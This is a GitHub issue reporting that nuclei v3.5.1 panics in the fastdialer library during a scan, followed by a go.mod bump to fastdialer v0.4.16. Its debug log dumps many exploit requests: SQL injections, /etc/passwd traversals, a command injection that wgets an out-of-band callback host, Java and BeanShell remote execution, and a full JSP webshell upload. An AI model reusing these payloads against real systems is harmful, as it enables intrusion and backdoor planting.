latest version of the fastdialer library contains a bug

### Is there an existing issue for this?

- [x] I have searched the existing issues.

### Current Behavior

After updating to the latest version 3.5.1 today, I encountered a memory exception error when testing the target

### Expected Behavior

Under normal circumstances, such as in version 3.5.0, scanning would continue without generating an error

### Steps To Reproduce

```
nuclei -u http://1.1.1.1:8083 -verbose

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.5.1

                projectdiscovery.io

[VER] Started metrics server at localhost:9092
[WRN] Failed to evaluate expression 'useraccounts': No parameter 'useraccounts' found.
[WRN] Failed to evaluate expression 'useraccounts': No parameter 'useraccounts' found.
[WRN] Failed to evaluate expression 'hex_decode(concat('00000460',start,generate_java_gadget('dns', 'http://{{interactsh-url}}', 'hex'),end))': No parameter 'start' found.
[WRN] Failed to evaluate expression 'generate_java_gadget('dns', 'http://{{interactsh-url}}', 'hex')+concat(end)': No parameter 'end' found.
[WRN] Failed to evaluate expression 'replace(BaseURL,"/","_")': No parameter 'BaseURL' found.
[WRN] Failed to evaluate expression 'sha1(serial)': No parameter 'serial' found.
[WRN] Failed to evaluate expression 'sha1(serial)': No parameter 'serial' found.
[WRN] Failed to evaluate expression 'sha1(serial)': No parameter 'serial' found.
[WRN] Failed to evaluate expression 'replace(user, '.', '')': No parameter 'user' found.
[WRN] Failed to evaluate expression 'replace(user, '.', '')': No parameter 'user' found.
[WRN] Failed to evaluate expression ' (hmac('sha1',b64_marshal_data,ghe_secret)) ': No parameter 'ghe_secret' found.
[WRN] Failed to evaluate expression ' (hmac('sha1',b64_marshal_data,ghe_secret)) ': No parameter 'ghe_secret' found.
[WRN] Failed to evaluate expression 'base64(hex_decode('00')+'apikey'+hex_decode('00')+token)': No parameter 'token' found.
[WRN] Failed to evaluate expression 'data+base64(encode1+'{{interactsh-url}}'+encode2)+concat(end+ '
')': No parameter 'data' found.
[WRN] Failed to evaluate expression 'replace(user, '.', '')': No parameter 'user' found.
[WRN] Failed to evaluate expression 'replace(user, '.', '')': No parameter 'user' found.
[WRN] Excluded 235 headless template[s] (disabled as default), use -headless option to run headless templates.
[WRN] Excluded 27 code template[s] (disabled as default), use -code option to run code templates.
[WRN] Excluded 48 dast template[s] (disabled as default), use -dast option to run dast templates.
[WRN] Excluded 194 template[s] with known weak matchers / tags excluded from default run using .nuclei-ignore
[WRN] Excluded 445 file template[s] (disabled as default), use -file option to run file templates.
[WRN] Excluded 1696 self-contained template[s] (disabled as default), use -esc option to run self-contained templates.
[WRN] Setting thread count to 0 for 48 templates, dynamic extractors are not supported with payloads yet
[INF] Current nuclei version: v3.5.1 (latest)
[INF] Current nuclei-templates version: v10.3.2 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 130
[INF] Templates loaded for current scan: 8909
[INF] Executing 8902 signed templates from projectdiscovery/nuclei-templates
[WRN] Loading 7 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] Templates clustered: 1896 (Reduced 1764 Requests)
[INF] Using Interactsh Server: oast.site
[WRN] [CNVD-2021-09650] Could not execute request for http://1.1.1.1:8083: cause="connection reset by peer" chain="got err while executing"
[WRN] [CNVD-2021-15822] Could not execute request for http://1.1.1.1:8083: cause="connection reset by peer" chain="got err while executing http://1.1.1.1:8083/public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q="
[WRN] [CNVD-2022-43245] Could not execute request for http://1.1.1.1:8083: cause="connection reset by peer" chain="got err while executing http://1.1.1.1:8083/weaver/org.apache.xmlrpc.webserver.XmlRpcServlet"
[WRN] [grafana-login-check] Could not make http request for http://1.1.1.1:8083: unresolved variables found: username,password
[WRN] [CNVD-2024-15077] Could not execute request for http://1.1.1.1:8083: cause="connection reset by peer" chain="got err while executing http://1.1.1.1:8083/dataSetParam/verification;swagger-ui/"
[WRN] [CNVD-C-2023-76801] Could not execute step on http://1.1.1.1:8083: cause="connection reset by peer" chain="got err while executing http://1.1.1.1:8083/uapjs/jsinvoke/?action=invoke; failed to execute http:1 protocol; got following errors while executing flow"
[WRN] [jira-login-check] Could not make http request for http://1.1.1.1:8083: unresolved variables found: username,password
[WRN] [CNVD-2020-26585] Could not make http request for http://1.1.1.1:8083: unresolved variables found: date%7D%7D//%7B%7Bfile
[WRN] [CNVD-2020-26585] Could not execute request for http://1.1.1.1:8083: cause="connection reset by peer" chain="got err while executing http://1.1.1.1:8083/index.php?s=/home/page/uploadImg"
[WRN] [CNVD-2021-64035] Could not execute request for http://1.1.1.1:8083: cause="connection reset by peer" chain="got err while executing http://1.1.1.1:8083/vpn/user/download/client?ostype=../../../../../../../../../etc/passwd"
[WRN] [CNVD-2023-12632] Could not execute request for http://1.1.1.1:8083: cause="connection reset by peer" chain="got err while executing http://1.1.1.1:8083/mobile/plugin/browser.jsp"
[WRN] [CNVD-2019-06255] Could not execute step on http://1.1.1.1:8083: cause="connection reset by peer" chain="got err while executing http://1.1.1.1:8083; failed to execute http:1 protocol; got following errors while executing flow"
[WRN] [CNVD-2023-03903] Could not execute request for http://1.1.1.1:8083: cause="connection reset by peer" chain="got err while executing http://1.1.1.1:8083/export/classroom-course-statistics?fileNames[]=../../../../../../../etc/passwd"
[WRN] [CNVD-2023-08743] Could not execute request for http://1.1.1.1:8083: cause="connection reset by peer" chain="got err while executing http://1.1.1.1:8083/servlet/codesettree?flag=c&status=1&codesetid=1&parentid=-1&categories=~31~27~20union~20all~20select~20~27hongjing~27~2c~40~40version~2d~2d"
[WRN] [CNVD-2020-56167] Could not execute request for http://1.1.1.1:8083: cause="connection reset by peer" chain="got err while executing http://1.1.1.1:8083/WEB_VMS/LEVEL15/"
[WRN] [CNVD-2022-42853] Could not execute request for http://1.1.1.1:8083: cause="connection reset by peer" chain="got err while executing http://1.1.1.1:8083/zentao/user-login.html"
[WRN] [CNVD-2019-32204] Could not execute request for http://1.1.1.1:8083: cause="connection reset by peer" chain="got err while executing http://1.1.1.1:8083/bsh.servlet.BshServlet"
[WRN] [CNVD-2021-33202] Could not execute request for http://1.1.1.1:8083: cause="connection reset by peer" chain="got err while executing http://1.1.1.1:8083/upgrade/detail.jsp/login/LoginSSO.jsp?id=1%20UNION%20SELECT%20md5(999999999)%20as%20id%20from%20HrmResourceManager"
[WRN] [CNVD-2024-33023] Could not execute request for http://1.1.1.1:8083: cause="connection reset by peer" chain="got err while executing http://1.1.1.1:8083/service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.release.ReleaseRepMngAction&method=updateDelFlag&TableSelectedID=1%27);WAITFOR+DELAY+%270:0:6%27--"
[WRN] [CNVD-2021-26422] Could not execute request for http://1.1.1.1:8083: cause="connection reset by peer" chain="got err while executing http://1.1.1.1:8083/webadm/?q=moni_detail.do&action=gragh"
panic: runtime error: invalid memory address or nil pointer dereference
[signal SIGSEGV: segmentation violation code=0x1 addr=0x18 pc=0xe09373]

goroutine 13669 [running]:
github.com/projectdiscovery/fastdialer/fastdialer.closeAfterTimeout.func1()
        github.com/projectdiscovery/fastdialer@v0.4.15/fastdialer/dialer_private.go:423 +0xd3
created by github.com/projectdiscovery/fastdialer/fastdialer.closeAfterTimeout in goroutine 13668
        github.com/projectdiscovery/fastdialer@v0.4.15/fastdialer/dialer_private.go:419 +0xed

```

### Relevant log output

```shell
nuclei -u http://1.1.1.1:8083 -debug

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.5.1

                projectdiscovery.io

[WRN] Failed to evaluate expression 'data+base64(encode1+'{{interactsh-url}}'+encode2)+concat(end+ '
')': No parameter 'data' found.
[WRN] Failed to evaluate expression 'replace(BaseURL,"/","_")': No parameter 'BaseURL' found.
[WRN] Failed to evaluate expression 'base64(hex_decode('00')+'apikey'+hex_decode('00')+token)': No parameter 'token' found.
[WRN] Failed to evaluate expression 'useraccounts': No parameter 'useraccounts' found.
[WRN] Failed to evaluate expression 'useraccounts': No parameter 'useraccounts' found.
[WRN] Failed to evaluate expression 'generate_java_gadget('dns', 'http://{{interactsh-url}}', 'hex')+concat(end)': No parameter 'end' found.
[WRN] Failed to evaluate expression 'replace(user, '.', '')': No parameter 'user' found.
[WRN] Failed to evaluate expression 'replace(user, '.', '')': No parameter 'user' found.
[WRN] Failed to evaluate expression 'hex_decode(concat('00000460',start,generate_java_gadget('dns', 'http://{{interactsh-url}}', 'hex'),end))': No parameter 'start' found.
[WRN] Failed to evaluate expression ' (hmac('sha1',b64_marshal_data,ghe_secret)) ': No parameter 'ghe_secret' found.
[WRN] Failed to evaluate expression ' (hmac('sha1',b64_marshal_data,ghe_secret)) ': No parameter 'ghe_secret' found.
[WRN] Failed to evaluate expression 'replace(user, '.', '')': No parameter 'user' found.
[WRN] Failed to evaluate expression 'replace(user, '.', '')': No parameter 'user' found.
[WRN] Failed to evaluate expression 'sha1(serial)': No parameter 'serial' found.
[WRN] Failed to evaluate expression 'sha1(serial)': No parameter 'serial' found.
[WRN] Failed to evaluate expression 'sha1(serial)': No parameter 'serial' found.
[WRN] Setting thread count to 0 for 48 templates, dynamic extractors are not supported with payloads yet
[INF] Current nuclei version: v3.5.1 (latest)
[INF] Current nuclei-templates version: v10.3.2 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 130
[INF] Templates loaded for current scan: 8909
[INF] Executing 8902 signed templates from projectdiscovery/nuclei-templates
[WRN] Loading 7 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] Templates clustered: 1896 (Reduced 1764 Requests)
[INF] Using Interactsh Server: oast.site
[INF] [CNVD-2021-09650] Dumped HTTP request for http://1.1.1.1:8083/guest_auth/guestIsUp.php

POST /guest_auth/guestIsUp.php HTTP/1.1
Host: 1.1.1.1:8083

mac=1&ip=127.0.0.1|wget d4eqk2ka4qjmg5ip8460chq3ye673ebyy.oast.site
[DBG] [CNVD-2021-09650] Dumped HTTP response http://1.1.1.1:8083/guest_auth/guestIsUp.php

HTTP/0.0 400 Bad Request
Content-Length: 0

[INF] [CNVD-2021-33202] Dumped HTTP request for http://1.1.1.1:8083/upgrade/detail.jsp/login/LoginSSO.jsp?id=1%20UNION%20SELECT%20md5(999999999)%20as%20id%20from%20HrmResourceManager

GET /upgrade/detail.jsp/login/LoginSSO.jsp?id=1%20UNION%20SELECT%20md5(999999999)%20as%20id%20from%20HrmResourceManager HTTP/1.1
Host: 1.1.1.1:8083
User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

[WRN] [CNVD-2021-33202] Could not execute request for http://1.1.1.1:8083: cause="connection reset by peer" chain="got err while executing http://1.1.1.1:8083/upgrade/detail.jsp/login/LoginSSO.jsp?id=1%20UNION%20SELECT%20md5(999999999)%20as%20id%20from%20HrmResourceManager"
[INF] [CNVD-2022-03672] Dumped HTTP request for http://1.1.1.1:8083/cgi-bin/rpc

POST /cgi-bin/rpc HTTP/1.1
Host: 1.1.1.1:8083
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:1.9.6.20) Gecko/ Firefox/3.6.2
Connection: close
Content-Length: 19
Accept-Encoding: gzip

action=verify-haras
[WRN] [CNVD-2022-03672] Could not make http request for http://1.1.1.1:8083: unresolved variables found: cid
[WRN] [CNVD-2022-03672] Could not execute request for http://1.1.1.1:8083: cause="connection reset by peer" chain="got err while executing http://1.1.1.1:8083/cgi-bin/rpc"
[WRN] [grafana-login-check] Could not make http request for http://1.1.1.1:8083: unresolved variables found: username,password
[WRN] [jira-login-check] Could not make http request for http://1.1.1.1:8083: unresolved variables found: username,password
[INF] [CNVD-C-2023-76801] Dumped HTTP request for http://1.1.1.1:8083/uapjs/jsinvoke/?action=invoke

POST /uapjs/jsinvoke/?action=invoke HTTP/1.1
Host: 1.1.1.1:8083
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.2 Safari/605.1.15
Connection: close
Content-Length: 256
Content-type: application/x-www-form-urlencoded
Accept-Encoding: gzip

{"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig","parameterTypes":["java.lang.Object","java.lang.String"],"parameters":["${param.getClass().forName(param.error).newInstance().eval(param.cmd)}","webapps/nc_web/Y9iVyfTEefjh.jsp"]}
[WRN] [CNVD-C-2023-76801] Could not execute step on http://1.1.1.1:8083: cause="connection reset by peer" chain="got err while executing http://1.1.1.1:8083/uapjs/jsinvoke/?action=invoke; failed to execute http:1 protocol; got following errors while executing flow"
[INF] [CNVD-2021-28277] Dumped HTTP request for http://1.1.1.1:8083/sys/ui/extend/varkind/custom.jsp

POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
Host: 1.1.1.1:8083
User-Agent: Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Connection: close
Content-Length: 42
Accept: */*
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

var={"body":{"file":"file:///etc/passwd"}}
[INF] [CNVD-2021-64035] Dumped HTTP request for http://1.1.1.1:8083/vpn/user/download/client?ostype=../../../../../../../../../etc/passwd

GET /vpn/user/download/client?ostype=../../../../../../../../../etc/passwd HTTP/1.1
Host: 1.1.1.1:8083
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ko-KR) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27
Connection: close
Accept-Encoding: gzip

[INF] [CNVD-2019-32204] Dumped HTTP request for http://1.1.1.1:8083/bsh.servlet.BshServlet

POST /bsh.servlet.BshServlet HTTP/1.1
Host: 1.1.1.1:8083
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.5 Safari/605.1.15
Connection: close
Content-Length: 58
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

bsh.script=exec("cat+/etc/passwd");&bsh.servlet.output=raw
[WRN] [CNVD-2021-64035] Could not execute request for http://1.1.1.1:8083: cause="connection reset by peer" chain="got err while executing http://1.1.1.1:8083/vpn/user/download/client?ostype=../../../../../../../../../etc/passwd"
[WRN] [CNVD-2019-32204] Could not execute request for http://1.1.1.1:8083: cause="connection reset by peer" chain="got err while executing http://1.1.1.1:8083/bsh.servlet.BshServlet"
[INF] [CNVD-2021-49104] Dumped HTTP request for http://1.1.1.1:8083/general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId

POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId HTTP/1.1
Host: 1.1.1.1:8083
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:109.0) Gecko/20100101 Firefox/115.0
Connection: close
Content-Length: 247
Content-Type: multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4
Accept-Encoding: gzip

--e64bdf16c554bbc109cecef6451c26a4
Content-Disposition: form-data; name="Filedata"; filename="35hA6EoACcnTIUbk1QQ3M5ZZtt9.php"
Content-Type: image/jpeg

<?php echo md5("35hA6EoACcnTIUbk1QQ3M5ZZtt9");?>

--e64bdf16c554bbc109cecef6451c26a4--
[INF] [CNVD-2022-86535] Dumped HTTP request for http://1.1.1.1:8083/?lang=../../../../../usr/local/php/pearcmd

GET /?lang=../../../../../usr/local/php/pearcmd HTTP/1.1
Host: 1.1.1.1:8083
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.2 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

[INF] [CNVD-2023-12632] Dumped HTTP request for http://1.1.1.1:8083/mobile/plugin/browser.jsp

POST /mobile/plugin/browser.jsp HTTP/1.1
Host: 1.1.1.1:8083
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
Connection: close
Content-Length: 1222
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

isDis=1&browserTypeId=269&keyword=%25%32%35%25%33%36%25%33%31%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%35%25%32%35%25%33%36%25%36%35%25%32%35%25%33%36%25%33%39%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%36%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%33%33%25%32%35%25%33%37%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%33%25%33%31%25%32%35%25%33%32%25%36%33%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%36%32%25%32%35%25%33%32%25%33%38%25%32%35%25%33%35%25%33%33%25%32%35%25%33%34%25%33%35%25%32%35%25%33%34%25%36%33%25%32%35%25%33%34%25%33%35%25%32%35%25%33%34%25%33%33%25%32%35%25%33%35%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%36%25%36%34%25%32%35%25%33%36%25%33%34%25%32%35%25%33%33%25%33%35%25%32%35%25%33%32%25%33%38%25%32%35%25%33%33%25%33%39%25%32%35%25%33%33%25%33%39%25%32%35%25%33%33%25%33%39%25%32%35%25%33%33%25%33%39%25%32%35%25%33%33%25%33%39%25%32%35%25%33%33%25%33%39%25%32%35%25%33%33%25%33%39%25%32%35%25%33%32%25%33%39%25%32%35%25%33%32%25%33%39%25%32%35%25%33%32%25%36%32%25%32%35%25%33%32%25%33%37
[INF] [CNVD-2023-03903] Dumped HTTP request for http://1.1.1.1:8083/export/classroom-course-statistics?fileNames[]=../../../../../../../etc/passwd

GET /export/classroom-course-statistics?fileNames[]=../../../../../../../etc/passwd HTTP/1.1
Host: 1.1.1.1:8083
User-Agent: Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

[WRN] [CNVD-2023-12632] Could not execute request for http://1.1.1.1:8083: cause="connection reset by peer" chain="got err while executing http://1.1.1.1:8083/mobile/plugin/browser.jsp"
[WRN] [CNVD-2023-03903] Could not execute request for http://1.1.1.1:8083: cause="connection reset by peer" chain="got err while executing http://1.1.1.1:8083/export/classroom-course-statistics?fileNames[]=../../../../../../../etc/passwd"
[INF] [CNVD-2022-43245] Dumped HTTP request for http://1.1.1.1:8083/weaver/org.apache.xmlrpc.webserver.XmlRpcServlet

POST /weaver/org.apache.xmlrpc.webserver.XmlRpcServlet HTTP/1.1
Host: 1.1.1.1:8083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Content-Length: 198
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?><methodCall>
<methodName>WorkflowService.getAttachment</methodName>
<params><param><value><string>/etc/passwd</string>
</value></param></params></methodCall>
[WRN] [CNVD-2022-43245] Could not execute request for http://1.1.1.1:8083: cause="connection reset by peer" chain="got err while executing http://1.1.1.1:8083/weaver/org.apache.xmlrpc.webserver.XmlRpcServlet"
[INF] [CNVD-2022-42853] Dumped HTTP request for http://1.1.1.1:8083/zentao/user-login.html

POST /zentao/user-login.html HTTP/1.1
Host: 1.1.1.1:8083
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_5; en-us) AppleWebKit/525.25 (KHTML, like Gecko) Version/3.2 Safari/525.25
Connection: close
Content-Length: 72
Content-Type: application/x-www-form-urlencoded
Referer: http://1.1.1.1:8083/zentao/user-login.html
Accept-Encoding: gzip

account=admin'+and++updatexml(1,concat(0x1,md5(999999999)),1)+and+'1'='1
[WRN] [CNVD-2022-42853] Could not execute request for http://1.1.1.1:8083: cause="connection reset by peer" chain="got err while executing http://1.1.1.1:8083/zentao/user-login.html"
[INF] [CNVD-2020-26585] Dumped HTTP request for http://1.1.1.1:8083/index.php?s=/home/page/uploadImg

POST /index.php?s=/home/page/uploadImg HTTP/1.1
Host: 1.1.1.1:8083
User-Agent: Mozilla/5.0 (X11; Linux i686; en-US) Gecko/20010604 Firefox/109.0
Connection: close
Content-Length: 273
Content-Type: multipart/form-data; boundary=--------------------------835846770881083140190633
Accept-Encoding: gzip

----------------------------835846770881083140190633
Content-Disposition: form-data; name="editormd-image-file"; filename="35hA6FDjBVSsgEq4lcRRoO1Qhle.<>txt"
Content-Type: text/plain

35hA6FDjBVSsgEq4lcRRoO1Qhle
----------------------------835846770881083140190633--
[WRN] [CNVD-2020-26585] Could not make http request for http://1.1.1.1:8083: unresolved variables found: date%7D%7D//%7B%7Bfile
[WRN] [CNVD-2020-26585] Could not execute request for http://1.1.1.1:8083: cause="connection reset by peer" chain="got err while executing http://1.1.1.1:8083/index.php?s=/home/page/uploadImg"
[INF] [CNVD-2020-56167] Dumped HTTP request for http://1.1.1.1:8083/WEB_VMS/LEVEL15/

POST /WEB_VMS/LEVEL15/ HTTP/1.1
Host: 1.1.1.1:8083
User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
Connection: close
Content-Length: 80
Accept: */*
Accept-Language: en
Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
Accept-Encoding: gzip

command=show basic-info dev&strurl=exec%04&mode=%02PRIV_EXEC&signname=Red-Giant.
[INF] [CNVD-2024-33023] Dumped HTTP request for http://1.1.1.1:8083/service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.release.ReleaseRepMngAction&method=updateDelFlag&TableSelectedID=1%27);WAITFOR+DELAY+%270:0:6%27--

GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.release.ReleaseRepMngAction&method=updateDelFlag&TableSelectedID=1%27);WAITFOR+DELAY+%270:0:6%27-- HTTP/1.1
Host: 1.1.1.1:8083
User-Agent: Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

[WRN] [CNVD-2024-33023] Could not execute request for http://1.1.1.1:8083: cause="connection reset by peer" chain="got err while executing http://1.1.1.1:8083/service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.release.ReleaseRepMngAction&method=updateDelFlag&TableSelectedID=1%27);WAITFOR+DELAY+%270:0:6%27--"
[WRN] [CNVD-2020-56167] Could not execute request for http://1.1.1.1:8083: cause="connection reset by peer" chain="got err while executing http://1.1.1.1:8083/WEB_VMS/LEVEL15/"
[INF] [CNVD-2021-26422] Dumped HTTP request for http://1.1.1.1:8083/webadm/?q=moni_detail.do&action=gragh

POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1
Host: 1.1.1.1:8083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.75 Safari/537.36
Connection: close
Content-Length: 25
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

type='|cat /etc/passwd||'
[WRN] [CNVD-2021-26422] Could not execute request for http://1.1.1.1:8083: cause="connection reset by peer" chain="got err while executing http://1.1.1.1:8083/webadm/?q=moni_detail.do&action=gragh"
[INF] [CNVD-2024-15077] Dumped HTTP request for http://1.1.1.1:8083/dataSetParam/verification;swagger-ui/

POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: 1.1.1.1:8083
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0
Connection: close
Content-Length: 339
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Content-Type: application/json;charset=UTF-8
Accept-Encoding: gzip

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
[WRN] [CNVD-2024-15077] Could not execute request for http://1.1.1.1:8083: cause="connection reset by peer" chain="got err while executing http://1.1.1.1:8083/dataSetParam/verification;swagger-ui/"
[INF] [CNVD-2021-15822] Dumped HTTP request for http://1.1.1.1:8083/public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q=

GET /public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q= HTTP/1.1
Host: 1.1.1.1:8083
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5 Safari/605.1.15
Connection: close
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

[INF] [CNVD-2020-68596] Dumped HTTP request for http://1.1.1.1:8083/public/index.php/material/Material/_download_imgage?media_id=1&picUrl=./../config/database.php

POST /public/index.php/material/Material/_download_imgage?media_id=1&picUrl=./../config/database.php HTTP/1.1
Host: 1.1.1.1:8083
User-Agent: Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Connection: close
Content-Length: 5
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

"1":1
[WRN] [CNVD-2021-15822] Could not execute request for http://1.1.1.1:8083: cause="connection reset by peer" chain="got err while executing http://1.1.1.1:8083/public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q="
[INF] [CNVD-2019-19299] Dumped HTTP request for http://1.1.1.1:8083/seeyon/htmlofficeservlet

POST /seeyon/htmlofficeservlet HTTP/1.1
Host: 1.1.1.1:8083
User-Agent: Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Content-Length: 1130
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q =0.8,application/signed-exchange;v=b3
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cache-Control: no-cache
Connection: close
Pragma: no-cache
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip

DBSTEP V3. 0 343 0 658 DBSTEP=OKMLlKlV
OPTION=S3WYOSWLBSGr
currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66
= WUghPB3szB3Xwg66 the CREATEDATE
recordID = qLSGw4SXzLeGw4V3wUw3zUoXwid6
originalFileId = wV66
originalCreateDate = wUghPB3szB3Xwg66
FILENAME = qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdb4o5nHzs
needReadFile = yRWZdAS6
originalCreateDate IZ = 66 = = wLSGP4oEzLKAz4
<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder ();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine( )) != null) {line.append(temp+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString() ;} %><%if("x".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("35hA6PVOcfDvOK8As9x7ocfZgFg"))){out.println("<pre>" +excuteCmd(request.getParameter("35hA6PVOcfDvOK8As9x7ocfZgFg")) + "</pre>");}else{out.println(":-)");}%>6e4f045d4b8506bf492ada7e3390d7ce
[INF] Skipped 1.1.1.1:8083 from target list as found unresponsive 30 times
[WRN] [CNVD-2019-19299] Could not execute request for http://1.1.1.1:8083: cause="connection reset by peer" chain="got err while executing http://1.1.1.1:8083/seeyon/htmlofficeservlet"
panic: runtime error: invalid memory address or nil pointer dereference
[signal SIGSEGV: segmentation violation code=0x1 addr=0x18 pc=0xe09373]

goroutine 13419 [running]:
github.com/projectdiscovery/fastdialer/fastdialer.closeAfterTimeout.func1()
        github.com/projectdiscovery/fastdialer@v0.4.15/fastdialer/dialer_private.go:423 +0xd3
created by github.com/projectdiscovery/fastdialer/fastdialer.closeAfterTimeout in goroutine 13418
        github.com/projectdiscovery/fastdialer@v0.4.15/fastdialer/dialer_private.go:419 +0xed
```

### Environment

```markdown
- OS: Ubuntu 20.04.6 LTS
- Nuclei: v3.5.1
- Go:go1.23.4 linux/amd64
```

### Anything else?

_No response_

--- a/go.mod
+++ b/go.mod
@@ -22,7 +22,7 @@ require (
 	github.com/olekukonko/tablewriter v1.0.8
 	github.com/pkg/errors v0.9.1
 	github.com/projectdiscovery/clistats v0.1.1
-	github.com/projectdiscovery/fastdialer v0.4.15
+	github.com/projectdiscovery/fastdialer v0.4.16
 	github.com/projectdiscovery/hmap v0.0.95
 	github.com/projectdiscovery/interactsh v1.2.4
 	github.com/projectdiscovery/rawhttp v0.1.90

